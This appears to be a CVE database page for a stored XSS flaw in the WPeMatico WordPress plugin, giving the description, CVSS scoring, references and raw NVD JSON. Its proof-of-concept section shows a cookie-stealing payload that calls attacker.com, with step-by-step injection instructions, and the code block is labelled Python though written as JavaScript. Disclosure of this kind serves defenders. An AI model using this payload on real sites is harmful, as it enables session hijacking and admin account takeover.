CVE-2025-13031

Description

The WPeMatico RSS Feed Fetcher WordPress plugin before 2.8.13 does not sanitize and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WPeMatico RSS Feed Fetcher < 2.8.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-13031 WPeMatico Stored XSS PoC
// This PoC demonstrates the stored XSS vulnerability in WPeMatico plugin < 2.8.13
// Requires contributor+ privileges

// Attacker injects the following payload in plugin settings fields:
// <script>alert(document.cookie)</script>
// or more sophisticated payload for session hijacking:
var poc_payload = `
<img src=x onerror="
  fetch('https://attacker.com/steal?c='+btoa(document.cookie))
">
`;

// The payload is stored in database without sanitization
// When admin visits the affected page, the script executes

// Example exploitation steps:
// 1. Login as contributor user
// 2. Navigate to WPeMatico settings
// 3. Inject XSS payload in settings fields (e.g., campaign title, feed URL)
// 4. Save the settings - payload gets stored
// 5. Wait for admin to view the settings page
// 6. Attacker receives admin cookies via webhook

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13031
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13031
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13031/
[4] VulDB https://vuldb.com/cve/CVE-2025-13031
[5] https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/
[6] https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13031", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:34.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPeMatico RSS Feed Fetcher WordPress plugin before 2.8.13 does not sanitize and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}